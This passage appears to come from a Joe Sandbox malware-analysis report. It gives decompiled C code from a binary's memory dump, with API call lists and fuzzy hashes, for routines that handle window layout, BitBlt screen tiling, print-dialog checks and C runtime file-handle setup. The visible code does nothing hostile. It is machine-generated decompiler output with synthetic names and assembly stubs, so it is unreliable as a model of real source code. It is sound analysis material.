                                            						asm("movsd");
                                            						_t287 = 0xc40000;
                                            						_push(0xc40000);
                                            					} else {
                                            						GetWindowRect( *(_t150 + 0x1c),  &_v60);
                                            						 *((intOrPtr*)(_t219 + 4)) = _a4;
                                            						 *((intOrPtr*)(_t219 + 8)) = _a8;
                                            						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
                                            						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
                                            						_t236 = _v60.top;
                                            						_v44.top = _t236;
                                            						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
                                            						_v16 =  *((intOrPtr*)(_t200 + 4));
                                            						_t202 = _v60.left;
                                            						_v44.right =  *_t198 + _t202;
                                            						_v44.left = _t202;
                                            						_t250 =  *_t200 + _t202;
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_v44.left = _t202;
                                            						_v44.right =  *_t200 + _t202;
                                            						_v44.top = _t236;
                                            						_v44.bottom = _v16 + _t236;
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						goto L6;
                                            					}
                                            				} else {
                                            					GetWindowRect( *(_t150 + 0x1c),  &_v60);
                                            					 *((intOrPtr*)(_t219 + 4)) = _a4;
                                            					 *((intOrPtr*)(_t219 + 8)) = _a8;
                                            					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
                                            					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
                                            					_v12 =  *_t211;
                                            					_v8 =  *((intOrPtr*)(_t211 + 4));
                                            					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
                                            					_t242 = _v60.top;
                                            					_v44.top = _t242;
                                            					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
                                            					_v16 =  *((intOrPtr*)(_t214 + 4));
                                            					_t216 = _v60.left;
                                            					_v44.right =  *_t209 + _t216;
                                            					_v44.left = _t216;
                                            					_t250 =  *_t214 + _t216;
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_v44.left = _t216;
                                            					_v44.right = _v12 + _t216;
                                            					_v44.top = _t242;
                                            					_v44.bottom = _v8 + _t242;
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_t308 = _v16 + _t242;
                                            					_v44.left = _t216;
                                            					_v8 = _t308;
                                            					_v44.bottom = _t308;
                                            					_v44.right = _t250;
                                            					_v44.top = _t242;
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_v44.left = _t216;
                                            					_v44.right = _t250;
                                            					_v44.top = _t242;
                                            					_v44.bottom = _v8;
                                            					L6:
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					_t287 = 0xc40000;
                                            					_push(0);
                                            					_push(0xc40000);
                                            					_t162 = _t219 + 0x48;
                                            				}
                                            				_push(_t162);
                                            				E004239AC();
                                            				_push(0);
                                            				_t263 = _t219 + 0x58;
                                            				_push(_t287);
                                            				_push(_t263);
                                            				E004239AC();
                                            				_t165 =  *0x439bf4; // 0x2
                                            				_t167 =  *0x439bf0; // 0x2
                                            				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
                                            				_t171 =  *0x439bf4; // 0x2
                                            				_t173 =  *0x439bf0; // 0x2
                                            				InflateRect(_t263,  ~_t173,  ~_t171);
                                            				_t264 = _a8;
                                            				_t289 = _a4;
                                            				E0041F5D0(_t219 + 0x28, _a4, _a8);
                                            				E0041F5D0(_t219 + 0x38, _a4, _a8);
                                            				E0041F5D0(_t219 + 0x48, _t289, _t264);
                                            				E0041F5D0(_t219 + 0x58, _t289, _t264);
                                            				 *((intOrPtr*)(_t219 + 0x74)) = E004201E2();
                                            				E0041F9E4(_t219, _t289, _t264);
                                            				return E00420341(_t219, _t250);
                                            			}
                                            0x0041f956
                                            0x0041f958
                                            0x0041f95b
                                            0x0041f95c
                                            0x0041f95d
                                            0x0041f962
                                            0x0041f970
                                            0x0041f97c
                                            0x0041f97e
                                            0x0041f986
                                            0x0041f98f
                                            0x0041f991
                                            0x0041f994
                                            0x0041f99d
                                            0x0041f9a8
                                            0x0041f9b3
                                            0x0041f9be
                                            0x0041f9ce
                                            0x0041f9d1
                                            0x0041f9e1

                                            APIs
                                              • Part of subcall function 0041FF70: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
                                              • Part of subcall function 0041FF70: GetMessageA.USER32 ref: 0041FF9B
                                              • Part of subcall function 0041FF70: DispatchMessageA.USER32 ref: 0041FFAE
                                              • Part of subcall function 0041FF70: SetRectEmpty.USER32(?), ref: 0041FFD7
                                              • Part of subcall function 0041FF70: GetDesktopWindow.USER32 ref: 0041FFEF
                                              • Part of subcall function 0041FF70: LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
                                              • Part of subcall function 0041FF70: GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017
                                              • Part of subcall function 0041A275: GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
                                              • Part of subcall function 0041A275: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
                                            • GetWindowRect.USER32 ref: 0041F6DF
                                              • Part of subcall function 0041A2AB: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
                                              • Part of subcall function 0041A2AB: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
                                            • GetWindowRect.USER32 ref: 0041F7CC
                                              • Part of subcall function 0041F5D0: OffsetRect.USER32(?,?,?), ref: 0041F607
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA0D
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA17
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA21
                                              • Part of subcall function 0041F9E4: OffsetRect.USER32(?,?,?), ref: 0041FA2B
                                              • Part of subcall function 00420341: GetCapture.USER32 ref: 00420352
                                              • Part of subcall function 00420341: SetCapture.USER32(?), ref: 00420362
                                              • Part of subcall function 00420341: GetCapture.USER32 ref: 0042036E
                                              • Part of subcall function 00420341: GetMessageA.USER32 ref: 00420388
                                              • Part of subcall function 00420341: DispatchMessageA.USER32 ref: 004203BA
                                              • Part of subcall function 00420341: GetCapture.USER32 ref: 00420418
                                            • GetWindowRect.USER32 ref: 0041F879
                                            • InflateRect.USER32(?,00000002,00000002), ref: 0041F97C
                                            • InflateRect.USER32(?,00000002,00000002), ref: 0041F98F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
                                            • String ID:
                                            • API String ID: 2041477333-0
                                            • Opcode ID: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
                                            • Instruction ID: 42ddb03621f51a7623203be26b69d0316b25f3a5275469d587ef5c4032a932e9
                                            • Opcode Fuzzy Hash: a6936e3c0a7907dd6ed1964909c9b8db90eacfd9e582db4c5833aae79c6c69c9
                                            • Instruction Fuzzy Hash: 55D13671A006199FCF04CF98C880ADEBBB6EF49310F1581AAED05BB255D7B1AA45CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E004041B5(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, signed int _a36, signed int _a40) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _t131;
                                            				signed int _t230;
                                            				void* _t267;
                                            
                                            				if(_a40 < 4) {
                                            					_a40 = 4;
                                            				}
                                            				asm("cdq");
                                            				_v8 = _a28 / _a40 + 1;
                                            				_t131 = _a32;
                                            				asm("cdq");
                                            				_t230 = _t131 % _a40;
                                            				_v12 = _t131 / _a40 + 1;
                                            				_v16 = 0;
                                            				while(1) {
                                            					asm("cdq");
                                            					if(_v16 >= _v12 - _t230 >> 1) {
                                            						break;
                                            					}
                                            					_v20 = 0;
                                            					while(_v20 < _v8 - _v16) {
                                            						BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v16 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v16 * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 + 1;
                                            					}
                                            					_v20 = 0;
                                            					while(_v20 < _v12 - _v16) {
                                            						BitBlt(_a16, _a20 + _a28 - (_v16 + 1) * _a40, _a24 + _v20 * _a40, _a40, _a40, _a4, _a8 + _a28 - (_v16 + 1) * _a40, _a12 + _v20 * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 + 1;
                                            					}
                                            					_v20 = _v8 - _v16;
                                            					while(_v20 >= 0) {
                                            						BitBlt(_a16, _a20 + (_v20 - 1) * _a40, _a24 + _a32 - (_v16 + 1) * _a40, _a40, _a40, _a4, _a8 + (_v20 - 1) * _a40, _a12 + _a32 - (_v16 + 1) * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 - 1;
                                            					}
                                            					_v20 = _v12 - _v16;
                                            					while(_v20 >= 0) {
                                            						BitBlt(_a16, _a20 + _v16 * _a40, _a24 + (_v20 - 1) * _a40, _a40, _a40, _a4, _a8 + _v16 * _a40, _a12 + (_v20 - 1) * _a40, 0xcc0020);
                                            						_t230 = _a36;
                                            						E0040381D(_t230);
                                            						_t267 = _t267 + 4;
                                            						_v20 = _v20 - 1;
                                            					}
                                            					_v16 = _v16 + 1;
                                            				}
                                            				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
                                            				return 1;
                                            			}











                                            APIs
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 00404260
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,?,00000000,00CC0020), ref: 004042E6
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,?,00CC0020), ref: 0040436F
                                            • BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 004043EC
                                            • BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404433
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
                                            • Instruction ID: 29e2845c1fd78097f43836e8b5be001507bced236b49523afccdde5b5024b9e6
                                            • Opcode Fuzzy Hash: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
                                            • Instruction Fuzzy Hash: 1EA197B1A001099FCB08CFACC995AEEB7B9FF88308F158659F919A7244D734E915CF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E0042669F(void* __ecx) {
                                            				intOrPtr _t67;
                                            				void* _t69;
                                            				void* _t72;
                                            				CHAR** _t77;
                                            				intOrPtr _t90;
                                            				signed int _t112;
                                            				void* _t117;
                                            				void* _t129;
                                            				intOrPtr* _t132;
                                            				signed short* _t134;
                                            				intOrPtr* _t135;
                                            				intOrPtr* _t136;
                                            				void* _t137;
                                            
                                            				E00406520(E00429D12, _t137);
                                            				_t129 = __ecx;
                                            				if( *((intOrPtr*)(_t137 + 8)) != 0) {
                                            					L20:
                                            					_push(0);
                                            					_push(0x14000c);
                                            					_push(1);
                                            					E0041009E(_t137 - 0x160);
                                            					 *(_t137 - 4) = 2;
                                            					E0041030E(_t137 - 0x160);
                                            					_t65 =  *((intOrPtr*)(_t129 + 0x94));
                                            					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                                            						E0041A92B(_t65);
                                            					}
                                            					_t66 =  *((intOrPtr*)(_t129 + 0x98));
                                            					_t132 = _t129 + 0x98;
                                            					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
                                            						E0041A92B(_t66);
                                            					}
                                            					_t67 =  *((intOrPtr*)(_t137 - 0x104));
                                            					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
                                            					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
                                            					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
                                            					_t117 = _t137 - 0x160;
                                            					L25:
                                            					_t69 = E00411D13(_t117);
                                            					L26:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
                                            					return _t69;
                                            				}
                                            				_t72 =  *(__ecx + 0x98);
                                            				if(_t72 == 0) {
                                            					goto L20;
                                            				}
                                            				_t69 = GlobalLock(_t72);
                                            				_t134 = _t69;
                                            				if((_t134[3] & 0x00000001) == 0) {
                                            					goto L26;
                                            				}
                                            				_push(0);
                                            				_push(0x14000c);
                                            				_push(1);
                                            				E0041009E(_t137 - 0xbc);
                                            				 *(_t137 - 4) = 0;
                                            				E0041030E(_t137 - 0xbc);
                                            				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
                                            					_t77 = E00410255(_t137 - 0xbc, _t137 - 0x10);
                                            					 *(_t137 - 4) = 1;
                                            					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
                                            						L10:
                                            						_t112 = 1;
                                            						L11:
                                            						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
                                            						E00416AEC(_t137 - 0x10);
                                            						if(_t112 == 0) {
                                            							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
                                            							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
                                            								E0041A92B(_t83);
                                            							}
                                            							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
                                            							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
                                            								E0041A92B(_t85);
                                            							}
                                            						} else {
                                            							_t88 =  *((intOrPtr*)(_t129 + 0x94));
                                            							_t135 = _t129 + 0x94;
                                            							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                                            								E0041A92B(_t88);
                                            							}
                                            							E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
                                            							_t90 =  *((intOrPtr*)(_t137 - 0x60));
                                            							 *_t135 =  *((intOrPtr*)(_t90 + 8));
                                            							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
                                            						}
                                            						L19:
                                            						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
                                            						_t117 = _t137 - 0xbc;
                                            						goto L25;
                                            					}
                                            					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00410292(_t137 - 0xbc, _t137 - 0x14))) != 0;
                                            					E00416AEC(_t137 - 0x14);
                                            					if( *((char*)(_t137 + 0xb)) != 0) {
                                            						goto L10;
                                            					}
                                            					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E004102D0(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
                                            					E00416AEC(_t137 - 0x18);
                                            					if(_t112 == 0) {
                                            						goto L11;
                                            					}
                                            					goto L10;
                                            				}
                                            				_t105 =  *((intOrPtr*)(_t129 + 0x94));
                                            				_t136 = _t129 + 0x94;
                                            				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
                                            					E0041A92B(_t105);
                                            				}
                                            				E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
                                            				 *_t136 = 0;
                                            				 *((intOrPtr*)(_t129 + 0x98)) = 0;
                                            				goto L19;
                                            			}

















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004266A4
                                            • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00426758
                                            • lstrcmpA.KERNEL32(?,00000000,?), ref: 00426776
                                            • lstrcmpA.KERNEL32(?,00000000,?,?), ref: 004267A4
                                              • Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
                                              • Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
                                              • Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957
                                            • GlobalLock.KERNEL32 ref: 004266CE
                                              • Part of subcall function 0041009E: __EH_prolog.LIBCMT ref: 004100A3
                                              • Part of subcall function 0041030E: PrintDlgA.COMDLG32(?,0042684E,00000001,0014000C,00000000,?,?,00000000), ref: 00410318
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
                                            • String ID:
                                            • API String ID: 2564375162-0
                                            • Opcode ID: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
                                            • Instruction ID: dab6b3ac01e2e209cde5cdaaba7fbabb505c74ae40abd7d4cd101a1c9b428fb9
                                            • Opcode Fuzzy Hash: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
                                            • Instruction Fuzzy Hash: E851A070B002269BCB14EF75D885FDAB7B8BF01308F41446EE559A3292DB38ED94CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 99%
                                            			E0040963B() {
                                            				void** _v8;
                                            				struct _STARTUPINFOA _v76;
                                            				signed int* _t48;
                                            				signed int _t50;
                                            				long _t55;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				int _t59;
                                            				signed char _t63;
                                            				signed int _t65;
                                            				void** _t67;
                                            				int _t68;
                                            				int _t69;
                                            				signed int* _t70;
                                            				int _t72;
                                            				intOrPtr* _t73;
                                            				signed int* _t75;
                                            				void* _t76;
                                            				void* _t84;
                                            				void* _t87;
                                            				int _t88;
                                            				signed int* _t89;
                                            				void** _t90;
                                            				signed int _t91;
                                            				int* _t92;
                                            
                                            				_t89 = E00405667(0x480);
                                            				if(_t89 == 0) {
                                            					E00406490(0x1b);
                                            				}
                                            				 *0x43b520 = _t89;
                                            				 *0x43b620 = 0x20;
                                            				_t1 =  &(_t89[0x120]); // 0x480
                                            				_t48 = _t1;
                                            				while(_t89 < _t48) {
                                            					_t89[1] = _t89[1] & 0x00000000;
                                            					 *_t89 =  *_t89 | 0xffffffff;
                                            					_t89[2] = _t89[2] & 0x00000000;
                                            					_t89[1] = 0xa;
                                            					_t70 =  *0x43b520; // 0x22d48c0
                                            					_t89 =  &(_t89[9]);
                                            					_t48 =  &(_t70[0x120]);
                                            				}
                                            				GetStartupInfoA( &_v76);
                                            				__eflags = _v76.cbReserved2;
                                            				if(_v76.cbReserved2 == 0) {
                                            					L25:
                                            					_t72 = 0;
                                            					__eflags = 0;
                                            					do {
                                            						_t75 =  *0x43b520; // 0x22d48c0
                                            						_t50 = _t72 + _t72 * 8;
                                            						__eflags = _t75[_t50] - 0xffffffff;
                                            						_t90 =  &(_t75[_t50]);
                                            						if(_t75[_t50] != 0xffffffff) {
                                            							_t45 =  &(_t90[1]);
                                            							 *_t45 = _t90[1] | 0x00000080;
                                            							__eflags =  *_t45;
                                            							goto L37;
                                            						}
                                            						__eflags = _t72;
                                            						_t90[1] = 0x81;
                                            						if(_t72 != 0) {
                                            							asm("sbb eax, eax");
                                            							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                                            							__eflags = _t55;
                                            						} else {
                                            							_t55 = 0xfffffff6;
                                            						}
                                            						_t87 = GetStdHandle(_t55);
                                            						__eflags = _t87 - 0xffffffff;
                                            						if(_t87 == 0xffffffff) {
                                            							L33:
                                            							_t90[1] = _t90[1] | 0x00000040;
                                            						} else {
                                            							_t57 = GetFileType(_t87);
                                            							__eflags = _t57;
                                            							if(_t57 == 0) {
                                            								goto L33;
                                            							}
                                            							_t58 = _t57 & 0x000000ff;
                                            							 *_t90 = _t87;
                                            							__eflags = _t58 - 2;
                                            							if(_t58 != 2) {
                                            								__eflags = _t58 - 3;
                                            								if(_t58 == 3) {
                                            									_t90[1] = _t90[1] | 0x00000008;
                                            								}
                                            								goto L37;
                                            							}
                                            							goto L33;
                                            						}
                                            						L37:
                                            						_t72 = _t72 + 1;
                                            						__eflags = _t72 - 3;
                                            					} while (_t72 < 3);
                                            					return SetHandleCount( *0x43b620);
                                            				}
                                            				_t59 = _v76.lpReserved2;
                                            				__eflags = _t59;
                                            				if(_t59 == 0) {
                                            					goto L25;
                                            				}
                                            				_t88 =  *_t59;
                                            				_t73 = _t59 + 4;
                                            				_v8 = _t73 + _t88;
                                            				__eflags = _t88 - 0x800;
                                            				if(_t88 >= 0x800) {
                                            					_t88 = 0x800;
                                            				}
                                            				__eflags =  *0x43b620 - _t88; // 0x20
                                            				if(__eflags >= 0) {
                                            					L18:
                                            					_t91 = 0;
                                            					__eflags = _t88;
                                            					if(_t88 <= 0) {
                                            						goto L25;
                                            					} else {
                                            						goto L19;
                                            					}
                                            					do {
                                            						L19:
                                            						_t76 =  *_v8;
                                            						__eflags = _t76 - 0xffffffff;
                                            						if(_t76 == 0xffffffff) {
                                            							goto L24;
                                            						}
                                            						_t63 =  *_t73;
                                            						__eflags = _t63 & 0x00000001;
                                            						if((_t63 & 0x00000001) == 0) {
                                            							goto L24;
                                            						}
                                            						__eflags = _t63 & 0x00000008;
                                            						if((_t63 & 0x00000008) != 0) {
                                            							L23:
                                            							_t65 = _t91 & 0x0000001f;
                                            							__eflags = _t65;
                                            							_t67 =  &(0x43b520[_t91 >> 5][_t65 + _t65 * 8]);
                                            							 *_t67 =  *_v8;
                                            							_t67[1] =  *_t73;
                                            							goto L24;
                                            						}
                                            						_t68 = GetFileType(_t76);
                                            						__eflags = _t68;
                                            						if(_t68 == 0) {
                                            							goto L24;
                                            						}
                                            						goto L23;
                                            						L24:
                                            						_v8 =  &(_v8[1]);
                                            						_t91 = _t91 + 1;
                                            						_t73 = _t73 + 1;
                                            						__eflags = _t91 - _t88;
                                            					} while (_t91 < _t88);
                                            					goto L25;
                                            				} else {
                                            					_t92 = 0x43b524;
                                            					while(1) {
                                            						_t69 = E00405667(0x480);
                                            						__eflags = _t69;
                                            						if(_t69 == 0) {
                                            							break;
                                            						}
                                            						 *0x43b620 =  *0x43b620 + 0x20;
                                            						__eflags =  *0x43b620;
                                            						 *_t92 = _t69;
                                            						_t13 = _t69 + 0x480; // 0x480
                                            						_t84 = _t13;
                                            						while(1) {
                                            							__eflags = _t69 - _t84;
                                            							if(_t69 >= _t84) {
                                            								break;
                                            							}
                                            							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
                                            							 *_t69 =  *_t69 | 0xffffffff;
                                            							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
                                            							 *((char*)(_t69 + 5)) = 0xa;
                                            							_t69 = _t69 + 0x24;
                                            							_t84 =  *_t92 + 0x480;
                                            						}
                                            						_t92 =  &(_t92[1]);
                                            						__eflags =  *0x43b620 - _t88; // 0x20
                                            						if(__eflags < 0) {
                                            							continue;
                                            						}
                                            						goto L18;
                                            					}
                                            					_t88 =  *0x43b620; // 0x20
                                            					goto L18;
                                            				}
                                            			}





























                                            APIs
                                            • GetStartupInfoA.KERNEL32(?), ref: 00409699
                                            • GetFileType.KERNEL32(?,?,00000000), ref: 00409744
                                            • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004097A7
                                            • GetFileType.KERNEL32(00000000,?,00000000), ref: 004097B5
                                            • SetHandleCount.KERNEL32 ref: 004097EC
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: FileHandleType$CountInfoStartup
                                            • String ID:
                                            • API String ID: 1710529072-0
                                            • Opcode ID: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
                                            • Instruction ID: 8f3487591cd982a3eb9725f147ad5950e145dc92a1b9c359c43610153c7b6e5a
                                            • Opcode Fuzzy Hash: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
                                            • Instruction Fuzzy Hash: F8510832514605CBD7208F38C884B7677E0EB05368F28467ED596EB3E2D7389C06C759
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E0042722C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				void* _v20;
                                            				void* __ebp;
                                            				intOrPtr* _t51;
                                            				intOrPtr _t54;
                                            				int _t58;
                                            				signed int _t65;
                                            				int _t77;
                                            				void* _t79;
                                            				signed int _t80;
                                            				signed int _t82;
                                            				signed int _t83;
                                            				int _t84;
                                            				void* _t88;
                                            				int _t91;
                                            				signed int _t100;
                                            				signed int _t104;
                                            				void* _t109;
                                            				struct tagRECT* _t110;
                                            
                                            				_t88 = __ecx;
                                            				_t104 = _a4 + _a4 * 4 << 3;
                                            				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
                                            				_t51 = E004271A8(__ecx, __edx, __eflags,  &_v20);
                                            				_v12 =  *_t51;
                                            				_v8 =  *((intOrPtr*)(_t51 + 4));
                                            				_t91 =  *(_t109 + 0x24);
                                            				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
                                            				_t54 =  *((intOrPtr*)(__ecx + 0xec));
                                            				if(_t54 == 0) {
                                            					 *(_t109 + 0x18) =  *(_t109 + 0x20);
                                            					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
                                            					L12:
                                            					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
                                            					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
                                            					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
                                            					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
                                            					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
                                            						_push(0x42e4b0);
                                            						_t65 = _t110->right - _t110->left + 0x10;
                                            						__eflags = _t65;
                                            						_push( &_v12);
                                            						_push(_t110->bottom - _t110->top + 0x10);
                                            						_push(_t65);
                                            						_push(1);
                                            						return E0041AE9C(_t88, _t65);
                                            					}
                                            					asm("cdq");
                                            					asm("cdq");
